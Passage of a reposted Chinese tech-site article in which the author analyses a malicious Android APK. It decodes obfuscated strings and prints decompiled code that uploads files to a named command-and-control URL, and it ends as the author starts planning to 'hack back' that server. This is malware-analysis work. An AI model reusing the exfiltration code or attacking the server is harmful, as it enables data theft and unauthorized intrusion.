加入收藏 | 设为首页 | 会员中心 | 我要投稿 核心网 (https://www.hxwgxz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

看我如何回怼手机黑客?黑回去!

发布时间:2018-08-13 18:31:56 所属栏目:业界 来源:clouds
导读:技术沙龙 | 8月25日与多位资深技术大咖探讨小程序电商实战 某天晚上,我躺在沙发上,偶然看到论坛中有人披露了一个由某黑客组织专门开发的恶意安卓应用APK,这些恶意APK是如何被发现的呢?我看了一下,其实也不难,黑客用一些性感女孩的照片创建了一个假Face

攻击者使用了工具ProGuard来对字符串和函数名进行了混淆,所以前述的我找不到任何URL字符串的原因就在于此。ProGuard是一个压缩、优化和混淆Java字节码文件的免费的工具,它可以删除无用的类、字段、方法和属性。解码之后,可以看到,其中包含了以下信息:

  1. private static final String f5386b = "POST" 
  2. private static final String f5387c = "Content-Type" 
  3. private static final String f5388d = "Application/x-www-form-urlencoded" 

接着,我检查了有哪些函数间接调用了 “HttpURLConnection” 类函数m7665a,结果是这样的:

  1. private static void m7672b(File file) { 
  2.     C1548e.m7665a(C1489a.m7489b(), C1551f.m7671a(file, C1489a.f5198i)).trim(); 
  4. public static String m7489b() { 
  5.     return f5199j + C1489a.m7487a() + f5201l; 
  7. public static String m7487a() { 
  8.     C1545b c1545b = new C1545b(f5203n.getFilesDir().getAbsolutePath(), f5202m); 
  9.     if (c1545b.exists()) { 
  10.         String str = new String(c1545b.m7647a()); 
  11.         if (!(str == null || str.isEmpty())) { 
  12.             return str; 
  13.         } 
  14.     } 
  15.     return f5204o; 

经过分析,我发现,函数m7672b在函数m7489b中定义URL链接时调用了函数m7665a,而在m7487a函数中,在末尾它返回了包含URL链接的f5204o。解码之后,该APK请求的远程服务器URL链接为:

HTTP://WWW.GLANCELOVE.COM/APPS/d/p/OP.PHP

另外,除了解码之后看到的APK内置连接请求URL链接,我还发现了很多其它有用的字符串:

  1. public static final String f5190a = ".ZIP" 
  2. public static final String f5191b = ".DATA" 
  3. public static final String f5192c = ".APK" 
  4. public static final byte[] f5193d = "A".getBytes(); 
  5. public static final byte[] f5194e = "B".getBytes(); 
  6. public static final byte[] f5195f = "F".getBytes(); 
  7. public static final byte[] f5196g = "CCC".getBytes(); 
  8. public static final byte[] f5197h = "D".getBytes(); 
  9. public static final byte[] f5198i = "E".getBytes(); 
  10. public static final String f5199j = "HTTP://" 
  11. public static final String f5200k = "TCP://"; 
  12. public static final String f5201l = "/APPS/d/p/OP.PHP" 
  13. public static final String f5202m = "IP.TXT" 
  14. private static Context f5203n = App.m7476a(); 
  15. private static String f5204o = "WWW.GLANCELOVE.COM" 
  16. private static byte[] f5394b = "devId=" 
  17. private static byte[] f5395c = "&op=" 
  18. private static byte[] f5396d = "&fName=" 
  19. private static byte[] f5397e = "&data=" 
  20. private static String f5398f = "true" 

从以上信息中可知,我可以利用参数 devId、op、fName和data来构造一个发往攻击控制服务器

(编辑:核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.hxwgxz.com/ All Rights Reserved. 核心网